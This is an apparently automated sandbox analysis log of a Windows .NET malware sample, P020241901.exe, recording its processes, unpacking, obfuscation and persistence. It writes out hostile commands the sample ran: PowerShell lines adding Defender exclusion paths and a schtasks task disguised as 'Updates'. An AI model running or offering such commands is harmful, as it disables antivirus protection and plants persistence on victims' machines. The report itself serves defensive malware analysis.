                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\P020241901.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\P020241901.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: P020241901.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\Desktop\P020241901.exeFile read: C:\Users\user\Desktop\P020241901.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmpJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\P020241901.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: P020241901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: P020241901.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: P020241901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: kugJ.pdbSHA256 source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
                      Source: Binary string: kugJ.pdb source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: P020241901.exe, frmGetData.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: VKkzqGUhsZwwm.exe.0.dr, frmGetData.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.P020241901.exe.4e90000.13.raw.unpack, Uni.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs.Net Code: xHRHxx28gr System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs.Net Code: xHRHxx28gr System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.P020241901.exe.25a3510.0.raw.unpack, Uni.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: P020241901.exeStatic PE information: 0x9A0837A8 [Wed Nov 22 01:36:40 2051 UTC]
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 0_2_06EDABA6 push dword ptr [edx+ebp*2-75h]; iretd 0_2_06EDABAF
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CCBCD2 push es; retf 9_2_05CCBCE2
                      Source: C:\Users\user\Desktop\P020241901.exeCode function: 9_2_05CCC451 push cs; retf 9_2_05CCC452
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeCode function: 10_2_06B89985 push FFFFFF8Bh; iretd 10_2_06B89987
                      Source: P020241901.exeStatic PE information: section name: .text entropy: 7.992542733514758
                      Source: VKkzqGUhsZwwm.exe.0.drStatic PE information: section name: .text entropy: 7.992542733514758
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, QXEfCQbO4ejMkoi2pkL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x6fktjWuqX', 'sVMkdSc0Qg', 'tCKkGh5fAb', 'NrGk1kv11V', 'FIIkbncMZt', 'fK1k8HeUlv', 'kg7krYiAfE'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, L6xr2KDkKl0X9RNbit.csHigh entropy of concatenated method names: 'vdaWjJBIGN', 'M0HWmXNaoQ', 'kYOWZBFKFd', 'WDeWP3AY87', 'QCEWAaTxAB', 'SmqWgnEH4Q', 'LNo0iORSgJ2QLHLO4B', 'VHxEspssYrjArm4Lj1', 'GvxWWWyCpp', 'tbJW6U8ETH'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, qfrOihsrVIqemUYdKb.csHigh entropy of concatenated method names: 'ToString', 'H8Og50Nunx', 's6rgKYiiYH', 'bH7gNSQ1dU', 'RUCgqOC56e', 'SrRg4Dwst5', 'rGjg049eAu', 'x9sglwBZJX', 'x6HgXiRS1k', 'zntg94e2cp'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, iGTtMKSJFrUfVV0vaA.csHigh entropy of concatenated method names: 'GPpVZpaJFI', 'AvXVP4LsJd', 'ToString', 'EdFVakxFDX', 'GVuVRXL6ay', 'uTlVM4jCDR', 'J9MVvicmQg', 'sgwV74PK0m', 'svkVjpA3Jb', 'FGiVmj9nSb'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, bPNNRdxo201VexQ9ab.csHigh entropy of concatenated method names: 'pKkyw4TH5K', 'BsqyKkklTS', 'huryNi9qIE', 'Q12yqyBcdE', 'gtVyt2017o', 'R6Uy4OnCTA', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, cadg7Rdhg8q8Fy4m9y.csHigh entropy of concatenated method names: 'GOZSUxuYfY', 'UClSBFXhZU', 'TKjSw2DAMv', 'G16SK9yXoM', 'qSpSqZ2Zq4', 'BRIS430fnL', 'jRTSl8lr6e', 'n4cSX3Ya3s', 'x0DSOF1VUn', 'zG5S5i5xt8'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, je9TcX0xAKQDM7LNZD.csHigh entropy of concatenated method names: 'M6xvowGRiB', 'fB3vevlLeC', 'uUVMNRonH5', 'FDDMq6YWC9', 'uL8M4t7XH6', 'suDM08xRur', 'z8gMl4xv4L', 'gvcMXivfpa', 'm8OM9lPrjy', 'CI1MO7vaqF'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.csHigh entropy of concatenated method names: 'kMr6srje9M', 'O386aNTZAq', 'kxe6RMR219', 'oEb6MMKdoK', 'ntR6vY8aTd', 'vPP67HcbJM', 'Dk16jDNrKX', 'Onq6mnFVnW', 'Aht6hnlUXT', 'sSb6ZhkjTK'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Mon41UfUXZQosr60DT.csHigh entropy of concatenated method names: 'DnmRtekQlP', 'vnrRdwBpSl', 't3BRG098iJ', 'lKMR1yvS6S', 'tGARbfmlaI', 'NT5R8tTlFI', 'SBmRrk8y9w', 'VjTRJGomwO', 'P8uRDwOV4a', 'u4HRcY2SZ9'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, tQZKKOEqWWpeP4Vpaf.csHigh entropy of concatenated method names: 'bYwyaAFNfN', 'gXbyRZmhQH', 'c4UyMbflvQ', 'BVZyvZIOQe', 'HrJy7w2xll', 'ljTyjovIYh', 'fLkymufj1M', 'Neqyh6cccP', 'QCMyZaiFZC', 'hBDyP52ovJ'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, go06C9moK82tIqZfYy.csHigh entropy of concatenated method names: 'zK3xN6txm', 'n1dTWSSuR', 'HAau0aoeQ', 'I6fesj9jT', 'XAqBHjxrZ', 'tPAFKG0jh', 'EZ9jFTgT7Xd7g5KoQw', 'l4wclXTS3cjFpnhayv', 'D68yEMTKl', 'I7fkTeePG'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, G3IEi4ompnZTtFNQRs.csHigh entropy of concatenated method names: 'cjDVJFOxu1', 'hfNVcChc1U', 'APdyQIZUbh', 'D5FyWRHW6v', 'FnBV52OX52', 'eDqVf7TYbO', 'lvDVEVdvso', 'CGFVtI8KYU', 'xgAVdlxwVw', 'KWsVGkY5cK'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Iy6OlWlTI2sYZDWQ9K.csHigh entropy of concatenated method names: 'fSGnWspfQG', 'EE9n6cu1dJ', 'EY5nHRgaHs', 'SsNnaO9cRK', 'OPAnR2V72F', 'fkXnvbVm7F', 'Ii1n7bANUc', 'kQIyrDUyRg', 'Q3fyJANjh5', 'JMdyDXW5TB'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, FXeZkIvxW4V3GyxGyW.csHigh entropy of concatenated method names: 'qCd7sFdZME', 'tbu7RsX5NB', 'wlD7vupM3G', 'F927jinM7M', 'OAg7m39fn3', 'aJOvbJPr5g', 'La2v8JCHHW', 'HcnvrTuRmv', 'ePQvJJLLg1', 'ClavD2HuJZ'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, wgEvRkgLjLLSsfE0cN.csHigh entropy of concatenated method names: 'P4kMTkW5f5', 'p56MuLVlwX', 'mJGMUxbKTN', 'w3ZMBlRHgm', 'cj8MAErJgr', 's82MgGSyVM', 'kq9MVnFGpb', 'dRBMyMpiOq', 'zuxMnThgpY', 'Q1oMkQsHxb'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, LS7BVe6fJxxEsYdQMj.csHigh entropy of concatenated method names: 'Dispose', 'aByWDSHOS6', 'xaoCKK0MkA', 'Gxw22VDmM1', 'WuhWcsbufo', 'hCOWzXDynr', 'ProcessDialogKey', 'XOjCQu3nFD', 'rQsCWHnAl6', 'JSeCCMGxdv'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, VWxAWNb5I4Q1gTqGVMC.csHigh entropy of concatenated method names: 'VvonIyDaPH', 'ibenYfsUhR', 'gu6nxA54IR', 'yCInTtBdfM', 'fZunokEmxZ', 'UZ4nuVNIGS', 'HUCnecoW8Q', 'bvgnUSe9fD', 'S5LnBv8fKI', 'hF6nFpqSyH'
                      Source: 0.2.P020241901.exe.3965270.12.raw.unpack, uW1uhjX5Oiqh7yN2Hx.csHigh entropy of concatenated method names: 'gEPjICbLS7', 'eRVjYMGovT', 'OyVjxynUGH', 'ge0jT6vcoU', 'HKajomD2tt', 'a5NjusyGt5', 'aS3jeSkJnw', 'TY6jUo8IWQ', 'FNwjBAN1s0', 'eUvjFjVU1A'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, QXEfCQbO4ejMkoi2pkL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x6fktjWuqX', 'sVMkdSc0Qg', 'tCKkGh5fAb', 'NrGk1kv11V', 'FIIkbncMZt', 'fK1k8HeUlv', 'kg7krYiAfE'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, L6xr2KDkKl0X9RNbit.csHigh entropy of concatenated method names: 'vdaWjJBIGN', 'M0HWmXNaoQ', 'kYOWZBFKFd', 'WDeWP3AY87', 'QCEWAaTxAB', 'SmqWgnEH4Q', 'LNo0iORSgJ2QLHLO4B', 'VHxEspssYrjArm4Lj1', 'GvxWWWyCpp', 'tbJW6U8ETH'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, qfrOihsrVIqemUYdKb.csHigh entropy of concatenated method names: 'ToString', 'H8Og50Nunx', 's6rgKYiiYH', 'bH7gNSQ1dU', 'RUCgqOC56e', 'SrRg4Dwst5', 'rGjg049eAu', 'x9sglwBZJX', 'x6HgXiRS1k', 'zntg94e2cp'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, iGTtMKSJFrUfVV0vaA.csHigh entropy of concatenated method names: 'GPpVZpaJFI', 'AvXVP4LsJd', 'ToString', 'EdFVakxFDX', 'GVuVRXL6ay', 'uTlVM4jCDR', 'J9MVvicmQg', 'sgwV74PK0m', 'svkVjpA3Jb', 'FGiVmj9nSb'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, bPNNRdxo201VexQ9ab.csHigh entropy of concatenated method names: 'pKkyw4TH5K', 'BsqyKkklTS', 'huryNi9qIE', 'Q12yqyBcdE', 'gtVyt2017o', 'R6Uy4OnCTA', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, cadg7Rdhg8q8Fy4m9y.csHigh entropy of concatenated method names: 'GOZSUxuYfY', 'UClSBFXhZU', 'TKjSw2DAMv', 'G16SK9yXoM', 'qSpSqZ2Zq4', 'BRIS430fnL', 'jRTSl8lr6e', 'n4cSX3Ya3s', 'x0DSOF1VUn', 'zG5S5i5xt8'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, je9TcX0xAKQDM7LNZD.csHigh entropy of concatenated method names: 'M6xvowGRiB', 'fB3vevlLeC', 'uUVMNRonH5', 'FDDMq6YWC9', 'uL8M4t7XH6', 'suDM08xRur', 'z8gMl4xv4L', 'gvcMXivfpa', 'm8OM9lPrjy', 'CI1MO7vaqF'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.csHigh entropy of concatenated method names: 'kMr6srje9M', 'O386aNTZAq', 'kxe6RMR219', 'oEb6MMKdoK', 'ntR6vY8aTd', 'vPP67HcbJM', 'Dk16jDNrKX', 'Onq6mnFVnW', 'Aht6hnlUXT', 'sSb6ZhkjTK'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Mon41UfUXZQosr60DT.csHigh entropy of concatenated method names: 'DnmRtekQlP', 'vnrRdwBpSl', 't3BRG098iJ', 'lKMR1yvS6S', 'tGARbfmlaI', 'NT5R8tTlFI', 'SBmRrk8y9w', 'VjTRJGomwO', 'P8uRDwOV4a', 'u4HRcY2SZ9'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, tQZKKOEqWWpeP4Vpaf.csHigh entropy of concatenated method names: 'bYwyaAFNfN', 'gXbyRZmhQH', 'c4UyMbflvQ', 'BVZyvZIOQe', 'HrJy7w2xll', 'ljTyjovIYh', 'fLkymufj1M', 'Neqyh6cccP', 'QCMyZaiFZC', 'hBDyP52ovJ'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, go06C9moK82tIqZfYy.csHigh entropy of concatenated method names: 'zK3xN6txm', 'n1dTWSSuR', 'HAau0aoeQ', 'I6fesj9jT', 'XAqBHjxrZ', 'tPAFKG0jh', 'EZ9jFTgT7Xd7g5KoQw', 'l4wclXTS3cjFpnhayv', 'D68yEMTKl', 'I7fkTeePG'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, G3IEi4ompnZTtFNQRs.csHigh entropy of concatenated method names: 'cjDVJFOxu1', 'hfNVcChc1U', 'APdyQIZUbh', 'D5FyWRHW6v', 'FnBV52OX52', 'eDqVf7TYbO', 'lvDVEVdvso', 'CGFVtI8KYU', 'xgAVdlxwVw', 'KWsVGkY5cK'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Iy6OlWlTI2sYZDWQ9K.csHigh entropy of concatenated method names: 'fSGnWspfQG', 'EE9n6cu1dJ', 'EY5nHRgaHs', 'SsNnaO9cRK', 'OPAnR2V72F', 'fkXnvbVm7F', 'Ii1n7bANUc', 'kQIyrDUyRg', 'Q3fyJANjh5', 'JMdyDXW5TB'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, FXeZkIvxW4V3GyxGyW.csHigh entropy of concatenated method names: 'qCd7sFdZME', 'tbu7RsX5NB', 'wlD7vupM3G', 'F927jinM7M', 'OAg7m39fn3', 'aJOvbJPr5g', 'La2v8JCHHW', 'HcnvrTuRmv', 'ePQvJJLLg1', 'ClavD2HuJZ'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, wgEvRkgLjLLSsfE0cN.csHigh entropy of concatenated method names: 'P4kMTkW5f5', 'p56MuLVlwX', 'mJGMUxbKTN', 'w3ZMBlRHgm', 'cj8MAErJgr', 's82MgGSyVM', 'kq9MVnFGpb', 'dRBMyMpiOq', 'zuxMnThgpY', 'Q1oMkQsHxb'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, LS7BVe6fJxxEsYdQMj.csHigh entropy of concatenated method names: 'Dispose', 'aByWDSHOS6', 'xaoCKK0MkA', 'Gxw22VDmM1', 'WuhWcsbufo', 'hCOWzXDynr', 'ProcessDialogKey', 'XOjCQu3nFD', 'rQsCWHnAl6', 'JSeCCMGxdv'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, VWxAWNb5I4Q1gTqGVMC.csHigh entropy of concatenated method names: 'VvonIyDaPH', 'ibenYfsUhR', 'gu6nxA54IR', 'yCInTtBdfM', 'fZunokEmxZ', 'UZ4nuVNIGS', 'HUCnecoW8Q', 'bvgnUSe9fD', 'S5LnBv8fKI', 'hF6nFpqSyH'
                      Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, uW1uhjX5Oiqh7yN2Hx.csHigh entropy of concatenated method names: 'gEPjICbLS7', 'eRVjYMGovT', 'OyVjxynUGH', 'ge0jT6vcoU', 'HKajomD2tt', 'a5NjusyGt5', 'aS3jeSkJnw', 'TY6jUo8IWQ', 'FNwjBAN1s0', 'eUvjFjVU1A'
                      Source: C:\Users\user\Desktop\P020241901.exeFile created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
